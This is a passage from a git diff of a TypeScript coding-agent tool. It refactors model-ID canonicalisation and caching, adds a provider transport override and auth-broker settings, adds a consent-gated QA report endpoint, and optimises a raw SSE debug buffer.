compactToDash = candidate.replace(EXPAND_COMPACT_MINOR_PATTERN, "$1$2-$3"); if (compactToDash !== candidate) { expanded.add(compactToDash); } - const compactToDot = candidate.replace(/(^|[-_/])(\d)(\d)(?=$|[-_a-z])/g, "$1$2.$3"); + const compactToDot = candidate.replace(EXPAND_COMPACT_MINOR_PATTERN, "$1$2.$3"); if (compactToDot !== candidate) { expanded.add(compactToDot); } return [...expanded]; } -function getHeuristicCanonicalCandidates(modelId: string): string[] { +function expandCheapCanonicalCandidates(normalized: string, queue: string[]): void { + const lowercased = lowercaseCandidate(normalized); + if (lowercased) { + queue.push(lowercased); + } + + const pathSegments = normalized.split("/"); + for (let index = 1; index < pathSegments.length; index += 1) { + queue.push(pathSegments.slice(index).join("/")); + } + + for (const suffix of getQualifiedNamespaceSuffixes(normalized)) { + queue.push(suffix); + } +} + +function expandHeavyCanonicalCandidates(normalized: string, queue: string[]): void { + for (const toggled of toggleShortVersionSeparators(normalized)) { + queue.push(toggled); + } + + const attachedFamilyVersion = insertAttachedFamilyVersionSeparator(normalized); + if (attachedFamilyVersion) { + queue.push(attachedFamilyVersion); + } + + for (const toggledSeriesVersion of toggleSeriesMinorVersionSeparators(normalized)) { + queue.push(toggledSeriesVersion); + } + + for (const expandedVersion of expandCompactMinorVersions(normalized)) { + queue.push(expandedVersion); + } + + for (const expandedSeriesVersion of expandCompactSeriesMinorVersions(normalized)) { + queue.push(expandedSeriesVersion); + } + + for (const wrapperCandidate of getWrapperCanonicalCandidates(normalized)) { + queue.push(wrapperCandidate); + } + + const strippedSyntheticPrefix = stripSyntheticPrefix(normalized); + if (strippedSyntheticPrefix) { + queue.push(strippedSyntheticPrefix); + } + + const strippedLatest = stripLatestSuffix(normalized); + if (strippedLatest) { + queue.push(strippedLatest); + } + + const strippedLegacyGlmTurbo = stripLegacyGlmTurboSuffix(normalized); + if (strippedLegacyGlmTurbo) { + queue.push(strippedLegacyGlmTurbo); + } + + const extractedFamily = extractUpstreamFamilyCandidate(normalized); + if (extractedFamily) { + queue.push(extractedFamily); + } + + const strippedProviderVersion = stripProviderVersionSuffix(normalized); + if (strippedProviderVersion) { + queue.push(strippedProviderVersion); + } + + const strippedDate = stripDateSuffix(normalized); + if (strippedDate) { + queue.push(strippedDate); + } + + const strippedMarker = stripTrailingMarker(normalized); + if (strippedMarker) { + queue.push(strippedMarker); + } + + const reorderedAnthropic = reorderAnthropicFamily(normalized); + if (reorderedAnthropic) { + queue.push(reorderedAnthropic); + } +} + +// Bounded FIFO memo: result depends only on `modelId` (the `_officialIds` param +// is unused — kept for signature stability). The returned array is consumed via +// `.filter` at every callsite, so sharing the cached instance is safe. +const HEURISTIC_CANDIDATES_CACHE = new Map<string, string[]>(); +const HEURISTIC_CANDIDATES_CACHE_CAP = 256; +function getHeuristicCanonicalCandidates(modelId: string, _officialIds?: ReadonlySet<string>): string[] { + const cached = HEURISTIC_CANDIDATES_CACHE.get(modelId); + if (cached !== undefined) { + return cached; + } const candidates = new Set<string>(); - const queue = [modelId]; + const queue: string[] = [modelId]; const visited = new Set<string>(); for (let qi = 0; qi < queue.length; qi += 1) { @@ -482,88 +656,19 @@ function getHeuristicCanonicalCandidates(modelId: string): string[] { } visited.add(normalized); addCanonicalCandidate(candidates, normalized); - - const lowercased = lowercaseCandidate(normalized); - if (lowercased) { - queue.push(lowercased); - } - - const pathSegments = normalized.split("/"); - for (let index = 1; index < pathSegments.length; index += 1) { - queue.push(pathSegments.slice(index).join("/")); - } - - for (const suffix of getQualifiedNamespaceSuffixes(normalized)) { - queue.push(suffix); - } - - for (const toggled of toggleShortVersionSeparators(normalized)) { - queue.push(toggled); - } - - const attachedFamilyVersion = insertAttachedFamilyVersionSeparator(normalized); - if (attachedFamilyVersion) { - queue.push(attachedFamilyVersion); - } - - for (const toggledSeriesVersion of toggleSeriesMinorVersionSeparators(normalized)) { - queue.push(toggledSeriesVersion); - } - - for (const expandedVersion of expandCompactMinorVersions(normalized)) { - queue.push(expandedVersion); - } - - for (const expandedSeriesVersion of expandCompactSeriesMinorVersions(normalized)) { - queue.push(expandedSeriesVersion); - } - - for (const wrapperCandidate of getWrapperCanonicalCandidates(normalized)) { - queue.push(wrapperCandidate); - } - - const strippedSyntheticPrefix = stripSyntheticPrefix(normalized); - if (strippedSyntheticPrefix) { - queue.push(strippedSyntheticPrefix); - } - - const strippedLatest = stripLatestSuffix(normalized); - if (strippedLatest) { - queue.push(strippedLatest); - } - - const strippedLegacyGlmTurbo = stripLegacyGlmTurboSuffix(normalized); - if (strippedLegacyGlmTurbo) { - queue.push(strippedLegacyGlmTurbo); - } - - const extractedFamily = extractUpstreamFamilyCandidate(normalized); - if (extractedFamily) { - queue.push(extractedFamily); - } - - const strippedProviderVersion = stripProviderVersionSuffix(normalized); - if (strippedProviderVersion) { - queue.push(strippedProviderVersion); - } - - const strippedDate = stripDateSuffix(normalized); - if (strippedDate) { - queue.push(strippedDate); - } - - const strippedMarker = stripTrailingMarker(normalized); - if (strippedMarker) { - queue.push(strippedMarker); - } - - const reorderedAnthropic = reorderAnthropicFamily(normalized); - if (reorderedAnthropic) { - queue.push(reorderedAnthropic); - } + expandCheapCanonicalCandidates(normalized, queue); + expandHeavyCanonicalCandidates(normalized, queue); } - return [...candidates]; + const output = [...candidates]; + if (HEURISTIC_CANDIDATES_CACHE.size >= HEURISTIC_CANDIDATES_CACHE_CAP) { + const oldest = HEURISTIC_CANDIDATES_CACHE.keys().next().value; + if (oldest !== undefined) { + HEURISTIC_CANDIDATES_CACHE.delete(oldest); + } + } + HEURISTIC_CANDIDATES_CACHE.set(modelId, output); + return output; } function getPreferredFallbackCanonicalCandidate(modelId: string, candidates: readonly string[]): string | undefined { @@ -612,7 +717,7 @@ function resolveCanonicalIdForModel( return { id: claudeFamilyAlias, source: claudeFamilyAlias === model.id ? "bundled" : "heuristic" }; } - const heuristicCandidates = getHeuristicCanonicalCandidates(model.id); + const heuristicCandidates = getHeuristicCanonicalCandidates(model.id, referenceData.officialIds); const officialMatches = heuristicCandidates.filter(candidate => referenceData.officialIds.has(candidate)); const preferredFallback = getPreferredFallbackCanonicalCandidate(model.id, heuristicCandidates); const match = selectBestOfficialCandidate(officialMatches); @@ -665,10 +770,11 @@ export function buildCanonicalModelIndex( const byId = new Map<string, CanonicalModelRecord>(); const bySelector = new Map<string, string>(); - let modelCache = resolutionCache.get(compiledEquivalence); + const compiledWithCache = compiledEquivalence as CompiledEquivalenceConfigWithCache; + let modelCache = compiledWithCache[kModelResolutionCache]; if (!modelCache) { modelCache = new WeakMap<Model<Api>, ResolvedCanonicalModel>(); - resolutionCache.set(compiledEquivalence, modelCache); + compiledWithCache[kModelResolutionCache] = modelCache; } for (const model of models) { @@ -688,10 +794,9 @@ export function buildCanonicalModelIndex( const existing = byId.get(canonicalKey); const nextRecord: CanonicalModelRecord = existing ?? { id: canonical.id, - name: getCanonicalRecordName(existing, canonical.id, variant, referenceData), + name: getCanonicalRecordName(undefined, canonical.id, variant, referenceData), variants: [], }; - nextRecord.name = getCanonicalRecordName(existing, canonical.id, variant, referenceData); nextRecord.variants.push(variant); byId.set(canonicalKey, nextRecord); bySelector.set(normalizeSelectorKey(selector), canonical.id); diff --git a/packages/coding-agent/src/config/model-registry.ts b/packages/coding-agent/src/config/model-registry.ts index 1a8dd41ee..d2247b13d 100644 --- a/packages/coding-agent/src/config/model-registry.ts +++ b/packages/coding-agent/src/config/model-registry.ts @@ -242,13 +242,14 @@ export const ModelsConfigFile = new ConfigFile<ModelsConfig>("models", ModelsCon }, ); -/** Provider override config (baseUrl, headers, apiKey, compat) without custom models */ +/** Provider override config (baseUrl, headers, apiKey, compat, transport) without custom models */ interface ProviderOverride { baseUrl?: string; headers?: Record<string, string>; apiKey?: string; authHeader?: boolean; compat?: Model<Api>["compat"]; + transport?: Model<Api>["transport"]; } interface DiscoveryProviderConfig { @@ -792,6 +793,10 @@ export class ModelRegistry { this.#customProviderApiKeys.clear(); this.#keylessProviders.clear(); this.#discoverableProviders = []; + // Drop config-sourced apiKeys from AuthStorage before reload; entries + // removed from models.yml must actually disappear from the resolver, not + // linger from the previous parse. The post-load setters below repopulate. + this.authStorage.clearConfigApiKeys(); // Restore runtime API keys before #loadModels — survives because // #loadModels only calls .set() on #customProviderApiKeys, never reassigns it. for (const [k, v] of this.#runtimeProviderApiKeys) { @@ -1081,14 +1086,15 @@ export class ModelRegistry { const configuredProviders = new Set(Object.keys(value.providers ?? {})); for (const [providerName, providerConfig] of providerEntries) { - // Always set overrides when baseUrl/headers/apiKey/authHeader/compat/disableStrictTools are present + // Always set overrides when baseUrl/headers/apiKey/authHeader/compat/disableStrictTools/transport are present if ( providerConfig.baseUrl || providerConfig.headers || providerConfig.apiKey || providerConfig.authHeader !== undefined || providerConfig.compat || - providerConfig.disableStrictTools + providerConfig.disableStrictTools || + providerConfig.transport ) { const disableStrictCompat = providerConfig.disableStrictTools ? { disableStrictTools: true } : undefined; overrides.set(providerName, { @@ -1097,6 +1103,7 @@ export class ModelRegistry { apiKey: providerConfig.apiKey, authHeader: providerConfig.authHeader, compat: mergeCompat(providerConfig.compat, disableStrictCompat), + transport: providerConfig.transport, }); } @@ -1117,9 +1124,14 @@ export class ModelRegistry { }); } - // Always store API key for fallback resolver + // Store API key for fallback resolver AND register as config override + // so it wins over OAuth tokens from the broker — when the user pins a + // bearer in models.yml (e.g. for an auth-gateway baseUrl), that bearer + // must authenticate the outbound request. if (providerConfig.apiKey) { this.#customProviderApiKeys.set(providerName, providerConfig.apiKey); + const resolved = resolveApiKeyConfig(providerConfig.apiKey); + if (resolved) this.authStorage.setConfigApiKey(providerName, resolved); } // Parse per-model overrides @@ -1183,6 +1195,7 @@ export class ModelRegistry { headers: providerOverride.headers ? { ...model.headers, ...providerOverride.headers } : model.headers, + ...(providerOverride.transport !== undefined ? { transport: providerOverride.transport } : {}), } : model; }), @@ -1684,11 +1697,12 @@ export class ModelRegistry { authHeader: override.authHeader ?? baseOverride?.authHeader, headers: override.headers ? { ...(baseOverride?.headers ?? {}), ...override.headers } : baseOverride?.headers, compat: override.compat ? mergeCompat(baseOverride?.compat, override.compat) : baseOverride?.compat, + transport: override.transport ?? baseOverride?.transport, }; } #applyProviderTransportOverride<T extends { baseUrl?: string; headers?: Record<string, string> }>( entry: T, - override: Pick<ProviderOverride, "baseUrl" | "headers" | "authHeader" | "apiKey">, + override: Pick<ProviderOverride, "baseUrl" | "headers" | "authHeader" | "apiKey" | "transport">, ): T { const headers = mergeAuthHeader( override.headers ? { ...entry.headers, ...override.headers } : entry.headers, @@ -1699,6 +1713,9 @@ export class ModelRegistry { ...entry, baseUrl: override.baseUrl ?? entry.baseUrl, headers, + // Preserve the model's existing transport when the override omits one; + // providers without a `transport` field keep the default per-API dispatch. + ...(override.transport !== undefined ? { transport: override.transport } : {}), }; } #applyRuntimeProviderOverrides(models: Model<Api>[]): Model<Api>[] { @@ -1766,6 +1783,8 @@ export class ModelRegistry { if (modelDefs.length === 0) continue; // Override-only, no custom models if (providerConfig.apiKey) { this.#customProviderApiKeys.set(providerName, providerConfig.apiKey); + const resolved = resolveApiKeyConfig(providerConfig.apiKey); + if (resolved) this.authStorage.setConfigApiKey(providerName, resolved); } for (const modelDef of modelDefs) { const providerCompat = providerConfig.disableStrictTools @@ -2008,6 +2027,7 @@ export class ModelRegistry { this.#runtimeProviderApiKeys.delete(providerName); this.#runtimeProviderOverrides.delete(providerName); this.#runtimeModelOverlays = this.#runtimeModelOverlays.filter(overlay => overlay.provider !== providerName); + this.authStorage.removeConfigApiKey(providerName); } /** @@ -2115,6 +2135,8 @@ export class ModelRegistry { this.#customProviderApiKeys.set(providerName, config.apiKey); // Persist runtime API keys so they survive #reloadStaticModels() cycles this.#runtimeProviderApiKeys.set(providerName, config.apiKey); + const resolved = resolveApiKeyConfig(config.apiKey); + if (resolved) this.authStorage.setConfigApiKey(providerName, resolved); } if (config.models && config.models.length > 0) { @@ -2168,12 +2190,19 @@ export class ModelRegistry { return; } - if (config.baseUrl || config.headers || config.apiKey || config.authHeader !== undefined) { + if ( + config.baseUrl || + config.headers || + config.apiKey || + config.authHeader !== undefined || + config.transport !== undefined + ) { const transportOverride = { baseUrl: config.baseUrl, headers: config.headers, apiKey: config.apiKey, authHeader: config.authHeader, + transport: config.transport, }; const nextRuntimeOverride = this.#mergeProviderOverride( this.#runtimeProviderOverrides.get(providerName), @@ -2221,6 +2250,8 @@ export interface ProviderConfigInput { headers?: Record<string, string>; compat?: Model<Api>["compat"]; authHeader?: boolean; + /** Streaming transport override — see {@link Model.transport}. */ + transport?: Model<Api>["transport"]; oauth?: { name: string; login(callbacks: OAuthLoginCallbacks): Promise<OAuthCredentials | string>; diff --git a/packages/coding-agent/src/config/model-resolver.ts b/packages/coding-agent/src/config/model-resolver.ts index 1d0ca277b..0fd27c431 100644 --- a/packages/coding-agent/src/config/model-resolver.ts +++ b/packages/coding-agent/src/config/model-resolver.ts @@ -116,12 +116,16 @@ function cloneModelWithRequestedId(model: Model<Api>, requestedId: string): Mode }; } -const providerModelIndexCache = new WeakMap<readonly Model<Api>[], Map<string, Model<Api> | null>>(); +const kProviderModelIndex = Symbol("model-resolver.providerIndex"); +type ModelsWithProviderIndex = readonly Model<Api>[] & { + [kProviderModelIndex]?: Map<string, Model<Api> | null>; +}; function getProviderModelIndex(availableModels: readonly Model<Api>[]): Map<string, Model<Api> | null> { - let index = providerModelIndexCache.get(availableModels); - if (index) return index; - index = new Map<string, Model<Api> | null>(); + const tagged = availableModels as ModelsWithProviderIndex; + const cached = tagged[kProviderModelIndex]; + if (cached) return cached; + const index = new Map<string, Model<Api> | null>(); for (const m of availableModels) { const key = `${m.provider.toLowerCase()}\u0000${m.id.toLowerCase()}`; if (index.has(key)) { @@ -130,7 +134,7 @@ function getProviderModelIndex(availableModels: readonly Model<Api>[]): Map<stri index.set(key, m); } } - providerModelIndexCache.set(availableModels, index); + tagged[kProviderModelIndex] = index; return index; } diff --git a/packages/coding-agent/src/config/models-config-schema.ts b/packages/coding-agent/src/config/models-config-schema.ts index 9b3802bcf..d8a6632d9 100644 --- a/packages/coding-agent/src/config/models-config-schema.ts +++ b/packages/coding-agent/src/config/models-config-schema.ts @@ -151,6 +151,14 @@ const ProviderConfigSchema = z.object({ models: z.array(ModelDefinitionSchema).optional(), modelOverrides: z.record(z.string(), ModelOverrideSchema).optional(), disableStrictTools: z.boolean().optional(), + /** + * Streaming transport override. When set to `"pi-native"`, omp dispatches + * every model under this provider via the auth-gateway's + * `POST /v1/pi/stream` endpoint instead of the per-provider SDK. The + * provider's `baseUrl` must point at a compatible `omp auth-gateway` + * and `apiKey` must carry the gateway bearer. + */ + transport: z.literal("pi-native").optional(), }); const EquivalenceConfigSchema = z.object({ diff --git a/packages/coding-agent/src/config/settings-schema.ts b/packages/coding-agent/src/config/settings-schema.ts index 289a1756f..89ecda299 100644 --- a/packages/coding-agent/src/config/settings-schema.ts +++ b/packages/coding-agent/src/config/settings-schema.ts @@ -234,6 +234,13 @@ export const SETTINGS_SCHEMA = { // ──────────────────────────────────────────────────────────────────────── lastChangelogVersion: { type: "string", default: undefined }, + // Auth broker — credentials proxied through a remote `omp auth-broker serve` + // host. Hidden from the UI; populate via env vars or hand-edited config.yml. + // Env (`OMP_AUTH_BROKER_URL` / `OMP_AUTH_BROKER_TOKEN`) takes precedence so + // per-machine overrides remain trivial. + "auth.broker.url": { type: "string", default: undefined }, + "auth.broker.token": { type: "string", default: undefined }, + autoResume: { type: "boolean", default: false, @@ -909,6 +916,16 @@ export const SETTINGS_SCHEMA = { }, }, + emojiAutocomplete: { + type: "boolean", + default: true, + ui: { + tab: "interaction", + label: "Emoji Autocomplete", + description: "Suggest emojis from `:name:` shortcodes and expand text emoticons like `:D` or `:-)`", + }, + }, + "startup.quiet": { type: "boolean", default: false, @@ -2636,6 +2653,41 @@ export const SETTINGS_SCHEMA = { }, }, + "dev.autoqaPush.endpoint": { + type: "string", + // Bundled QA collector — runs `/work/pi-www/autoqa` behind qa.omp.sh. + // Override via `PI_AUTO_QA_PUSH_URL` or `dev.autoqaPush.endpoint` + // in `config.yml` to point at a self-hosted instance. + default: "https://qa.omp.sh/v1/grievances" as const, + ui: { + tab: "tools", + label: "Auto QA Push Endpoint", + description: "Full URL that receives the JSON payload (default ships to https://qa.omp.sh/v1/grievances)", + }, + }, + + "dev.autoqaPush.token": { + type: "string", + default: undefined, + }, + + /** + * User decision on sharing automatic `report_tool_issue` grievances. + * + * - `"unset"` — never asked; the first `report_tool_issue` invocation + * pops a consent dialog and persists the answer here. + * - `"granted"` — record and (when push is configured) ship grievances. + * - `"denied"` — silently no-op every `report_tool_issue` call. + * + * Owned by `packages/coding-agent/src/tools/report-tool-issue.ts` via the + * process-global consent handler registered by `InteractiveMode`. + */ + "dev.autoqa.consent": { + type: "enum", + values: ["unset", "granted", "denied"] as const, + default: "unset" as const, + }, + "thinkingBudgets.minimal": { type: "number", default: 1024 }, "thinkingBudgets.low": { type: "number", default: 2048 }, diff --git a/packages/coding-agent/src/cursor.ts b/packages/coding-agent/src/cursor.ts index 660f59825..a174c9644 100644 --- a/packages/coding-agent/src/cursor.ts +++ b/packages/coding-agent/src/cursor.ts @@ -13,7 +13,7 @@ import type { CursorExecHandlers as ICursorExecHandlers, ToolResultMessage, } from "@oh-my-pi/pi-ai"; -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { resolveToCwd } from "./tools/path-utils"; interface CursorExecBridgeOptions { diff --git a/packages/coding-agent/src/debug/log-formatting.ts b/packages/coding-agent/src/debug/log-formatting.ts index 155610569..ac86e8cc3 100644 --- a/packages/coding-agent/src/debug/log-formatting.ts +++ b/packages/coding-agent/src/debug/log-formatting.ts @@ -1,4 +1,4 @@ -import { sanitizeText } from "@oh-my-pi/pi-natives"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { replaceTabs, truncateToWidth, wrapTextWithAnsi } from "../tools/render-utils"; export function formatDebugLogLine(line: string, maxWidth: number): string { diff --git a/packages/coding-agent/src/debug/log-viewer.ts b/packages/coding-agent/src/debug/log-viewer.ts index 421fee972..43a6f2db0 100644 --- a/packages/coding-agent/src/debug/log-viewer.ts +++ b/packages/coding-agent/src/debug/log-viewer.ts @@ -1,4 +1,3 @@ -import { sanitizeText } from "@oh-my-pi/pi-natives"; import { type Component, extractPrintableText, @@ -8,6 +7,7 @@ import { truncateToWidth, visibleWidth, } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { theme } from "../modes/theme/theme"; import { copyToClipboard } from "../utils/clipboard"; import { diff --git a/packages/coding-agent/src/debug/profiler.ts b/packages/coding-agent/src/debug/profiler.ts index 38774bc7e..242cb2a2f 100644 --- a/packages/coding-agent/src/debug/profiler.ts +++ b/packages/coding-agent/src/debug/profiler.ts @@ -121,6 +121,10 @@ export async function startCpuProfile(): Promise<ProfilerSession> { session.connect(); await session.post("Profiler.enable"); + // Default CDP interval is 1ms, which mis-attributes await-resumption samples + // to the line after `await` (one sparse sample inherits the entire wait). 100µs + // scatters samples enough to keep CPU vs. async-wait attribution honest. + await session.post("Profiler.setSamplingInterval", { interval: 100 }); await session.post("Profiler.start"); return { diff --git a/packages/coding-agent/src/debug/raw-sse-buffer.ts b/packages/coding-agent/src/debug/raw-sse-buffer.ts index 813d908a5..9120637b6 100644 --- a/packages/coding-agent/src/debug/raw-sse-buffer.ts +++ b/packages/coding-agent/src/debug/raw-sse-buffer.ts @@ -37,43 +37,50 @@ export interface RawSseDebugSnapshot { lastUpdatedAt?: number; } -function modelProvider(model: Model | undefined): string | undefined { - return model?.provider; -} +// Per-record char counts are stored in a parallel array (`#recordChars`) on +// the buffer rather than stamped onto each record via a symbol property. +// Stamping triggered hidden-class transitions in V8/JSC — the previous +// revision saw `trimRawLines` regress 4× (0.5s → 2.0s in a 50s profile) +// because every event-record allocation went through the slow dictionary +// path. The parallel array keeps records as plain monomorphic objects. +type TrimResult = { raw: string[]; truncated: boolean; originalChars: number; chars: number }; -function modelId(model: Model | undefined): string | undefined { - return model?.id; -} +// Single-pass trim. Returns the final `chars` count using the historical +// formula `reduce(line.length + 1, init = 1)` so the new accounting matches +// the previous `countRecordChars` byte-for-byte (the trailing +1 covers the +// record-level newline that `rawRecordText` appends in `toRawText`). +// +// When the event fits within budget the input `raw` array is returned +// **by reference** — see the ownership contract documented at +// `RawSseDebugBuffer.recordEvent` below. +function trimRawLines(raw: string[]): TrimResult { + let originalChars = 0; + for (let i = 0; i < raw.length; i++) originalChars += raw[i].length + 1; -function modelApi(model: Model | undefined): string | undefined { - return model?.api; -} - -function countRecordChars(record: RawSseDebugRecord): number { - if (record.kind === "response") return formatRawSseResponseComment(record).length + 1; - return record.raw.reduce((sum, line) => sum + line.length + 1, 1); -} - -function trimRawLines(raw: string[]): { raw: string[]; truncated: boolean; originalChars: number } { - const originalChars = raw.reduce((sum, line) => sum + line.length + 1, 0); if (originalChars <= MAX_RAW_SSE_EVENT_CHARS) { - return { raw: [...raw], truncated: false, originalChars }; + return { raw, truncated: false, originalChars, chars: originalChars + 1 }; } const trimmed: string[] = []; let remaining = MAX_RAW_SSE_EVENT_CHARS; + let chars = 1; // matches reduce(.., init = 1) for (const line of raw) { if (remaining <= 0) break; if (line.length + 1 <= remaining) { trimmed.push(line); + chars += line.length + 1; remaining -= line.length + 1; continue; } - trimmed.push(line.slice(0, Math.max(0, remaining))); + const slice = line.slice(0, Math.max(0, remaining)); + trimmed.push(slice); + chars += slice.length + 1; remaining = 0; } - trimmed.push(`: omp-debug-truncated originalChars=${originalChars}`); - return { raw: trimmed, truncated: true, originalChars }; + const tail = `: omp-debug-truncated originalChars=${originalChars}`; + trimmed.push(tail); + chars += tail.length + 1; + return { raw: trimmed, truncated: true, originalChars, chars }; } export function formatRawSseIsoTime(timestamp: number): string { @@ -110,6 +117,11 @@ function metadataTransport(response: ProviderResponseMetadata): string | undefin export class RawSseDebugBuffer { #records: RawSseDebugRecord[] = []; + // Parallel to `#records`: `#recordChars[i]` is the precomputed char count + // for `#records[i]`. Kept in lockstep by `#append` (push both) and + // `#enforceLimits` (shift both). See the comment above the class for why + // this is a sidecar array instead of a per-record property. + #recordChars: number[] = []; #totalChars = 0; #droppedRecords = 0; #droppedChars = 0; @@ -117,6 +129,7 @@ export class RawSseDebugBuffer { #lastUpdatedAt: number | undefined; #nextSequence = 1; #listeners = new Set<() => void>(); + #emitScheduled = false; subscribe(listener: () => void): () => void { this.#listeners.add(listener); @@ -124,34 +137,46 @@ export class RawSseDebugBuffer { } recordResponse(response: ProviderResponseMetadata, model?: Model): void { - this.#append({ + const record: RawSseDebugRecord = { kind: "response", sequence: this.#nextSequence++, timestamp: Date.now(), - provider: modelProvider(model), - model: modelId(model), - api: modelApi(model), + provider: model?.provider, + model: model?.id, + api: model?.api, status: response.status, requestId: response.requestId, transport: metadataTransport(response), - }); + }; + this.#append(record, formatRawSseResponseComment(record).length + 1); } + // Ownership contract for `event.raw`: + // The caller (either `notifyRawSseEvent` in `packages/ai/src/utils/sse-debug.ts` + // or `SseTeeParser.#dispatch` directly) hands us a freshly-allocated + // `string[]` per event and never retains, mutates, or re-dispatches it. + // That lets `trimRawLines` keep the array by reference instead of + // cloning on every chunk — a measurable savings on the streaming hot + // path. If a future observer-chain mutates the array, restore the + // `raw.slice()` defensive copy inside `trimRawLines`. recordEvent(event: RawSseEvent, model?: Model): void { const trimmed = trimRawLines(event.raw); this.#totalEvents += 1; - this.#append({ - kind: "event", - sequence: this.#nextSequence++, - timestamp: Date.now(), - provider: modelProvider(model), - model: modelId(model), - api: modelApi(model), - event: event.event, - raw: trimmed.raw, - truncated: trimmed.truncated, - originalChars: trimmed.originalChars, - }); + this.#append( + { + kind: "event", + sequence: this.#nextSequence++, + timestamp: Date.now(), + provider: model?.provider, + model: model?.id, + api: model?.api, + event: event.event, + raw: trimmed.raw, + truncated: trimmed.truncated, + originalChars: trimmed.originalChars, + }, + trimmed.chars, + ); } snapshot(): RawSseDebugSnapshot { @@ -165,12 +190,14 @@ export class RawSseDebugBuffer { } toRawText(): string { + // Reads the live array directly: `rawRecordText` only computes a string + // from each record, so no caller-visible mutation is possible. return this.#records.map(rawRecordText).join("\n"); } - #append(record: RawSseDebugRecord): void { - const chars = countRecordChars(record); + #append(record: RawSseDebugRecord, chars: number): void { this.#records.push(record); + this.#recordChars.push(chars); this.#totalChars += chars; this.#lastUpdatedAt = record.timestamp; this.#enforceLimits(); @@ -179,9 +206,9 @@ export class RawSseDebugBuffer { #enforceLimits(): void { while (this.#records.length > MAX_RAW_SSE_EVENTS || this.#totalChars > MAX_RAW_SSE_CHARS) { - const dropped = this.#records.shift(); - if (!dropped) return; - const chars = countRecordChars(dropped); + if (this.#records.length === 0) return; + this.#records.shift(); + const chars = this.#recordChars.shift() ?? 0; this.#totalChars = Math.max(0, this.#totalChars - chars); this.#droppedRecords += 1; this.#droppedChars += chars; @@ -189,6 +216,26 @@ export class RawSseDebugBuffer { } #emit(): void { + const count = this.#listeners.size; + if (count === 0) return; + // With a single listener (the common case — RawSse debug viewer is the + // only subscriber), keep eager emit so per-event semantics are + // preserved. With multiple listeners, coalesce bursts of events into + // one microtask-deferred fan-out to avoid N×M listener invocations + // during a streaming response. + if (count === 1) { + this.#fanOut(); + return; + } + if (this.#emitScheduled) return; + this.#emitScheduled = true; + queueMicrotask(() => { + this.#emitScheduled = false; + this.#fanOut(); + }); + } + + #fanOut(): void { for (const listener of this.#listeners) { try { listener(); @@ -199,31 +246,25 @@ export class RawSseDebugBuffer { } } -const fallbackBuffers = new WeakMap<object, RawSseDebugBuffer>(); const globalFallbackBuffer = new RawSseDebugBuffer(); +const kRawSseDebugBuffer = Symbol("debug.rawSseBuffer"); +type OwnerWithBuffer = object & { rawSseDebugBuffer?: unknown; [kRawSseDebugBuffer]?: RawSseDebugBuffer }; export function resolveRawSseDebugBuffer(owner?: object): RawSseDebugBuffer { if (!owner) return globalFallbackBuffer; - const candidate = (owner as { rawSseDebugBuffer?: unknown }).rawSseDebugBuffer; - if (candidate instanceof RawSseDebugBuffer) return candidate; + const tagged = owner as OwnerWithBuffer; + const declared = tagged.rawSseDebugBuffer; + if (declared instanceof RawSseDebugBuffer) return declared; - const existing = fallbackBuffers.get(owner); + const existing = tagged[kRawSseDebugBuffer]; if (existing) return existing; const buffer = new RawSseDebugBuffer(); - fallbackBuffers.set(owner, buffer); - if (Object.isExtensible(owner)) { - try { - Object.defineProperty(owner, "rawSseDebugBuffer", { - value: buffer, - configurable: true, - enumerable: false, - writable: true, - }); - } catch { - // The WeakMap fallback remains usable if the session object rejects extension. - } + try { + tagged[kRawSseDebugBuffer] = buffer; + } catch { + // Non-extensible owner: caller gets a fresh buffer on each call. } return buffer; } diff --git a/packages/coding-agent/src/debug/raw-sse.ts b/packages/coding-agent/src/debug/raw-sse.ts index 0ebbb3243..c3d812264 100644 --- a/packages/coding-agent/src/debug/raw-sse.ts +++ b/packages/coding-agent/src/debug/raw-sse.ts @@ -1,5 +1,5 @@ -import { sanitizeText } from "@oh-my-pi/pi-natives"; import { type Component, matchesKey, padding, replaceTabs, truncateToWidth, visibleWidth } from "@oh-my-pi/pi-tui"; +import { sanitizeText } from "@oh-my-pi/pi-utils"; import { theme } from "../modes/theme/theme"; import { copyToClipboard } from "../utils/clipboard"; import { formatRawSseIsoTime, type RawSseDebugBuffer, rawSseRecordLines } from "./raw-sse-buffer"; diff --git a/packages/coding-agent/src/edit/modes/apply-patch.ts b/packages/coding-agent/src/edit/modes/apply-patch.ts index c7facca59..74a6bf0ca 100644 --- a/packages/coding-agent/src/edit/modes/apply-patch.ts +++ b/packages/coding-agent/src/edit/modes/apply-patch.ts @@ -14,11 +14,7 @@ import { ApplyPatchError } from "../diff"; import type { PatchEditEntry } from "./patch"; export const applyPatchSchema = z.object({ - input: z - .string() - .describe( - "Full Codex apply_patch envelope, including '*** Begin Patch' and '*** End Patch'. Contains any mix of Add/Delete/Update (with optional Move to) file operations.", - ), + input: z.string().describe("apply_patch envelope"), }); export type ApplyPatchParams = z.infer<typeof applyPatchSchema>; diff --git a/packages/coding-agent/src/edit/modes/patch.ts b/packages/coding-agent/src/edit/modes/patch.ts index f935f652a..1b6f9a9a4 100644 --- a/packages/coding-agent/src/edit/modes/patch.ts +++ b/packages/coding-agent/src/edit/modes/patch.ts @@ -1578,16 +1578,16 @@ export async function computePatchDiff( export const patchEditEntrySchema = z .object({ - op: z.enum(["create", "delete", "update"]).optional().describe("Operation (default: update)"), - rename: z.string().describe("New path for move").optional(), - diff: z.string().describe("Diff hunks (update) or full content (create)").optional(), + op: z.enum(["create", "delete", "update"]).optional().describe("operation (default update)"), + rename: z.string().describe("new path for move").optional(), + diff: z.string().describe("diff hunks or full content for create").optional(), }) .strict(); export const patchEditSchema = z .object({ - path: z.string().describe("file path for edits"), - edits: z.array(patchEditEntrySchema).min(1).describe("Patch operations"), + path: z.string().describe("file path"), + edits: z.array(patchEditEntrySchema).min(1).describe("patch operations"), }) .strict(); diff --git a/packages/coding-agent/src/edit/modes/replace.ts b/packages/coding-agent/src/edit/modes/replace.ts index 00f8229b0..be3fde872 100644 --- a/packages/coding-agent/src/edit/modes/replace.ts +++ b/packages/coding-agent/src/edit/modes/replace.ts @@ -978,16 +978,16 @@ export function findContextLine( export const replaceEditEntrySchema = z .object({ - old_text: z.string().describe("Text to find (fuzzy whitespace matching enabled)"), - new_text: z.string().describe("Replacement text"), - all: z.boolean().describe("Replace all occurrences (default: unique match required)").optional(), + old_text: z.string().describe("text to find"), + new_text: z.string().describe("replacement 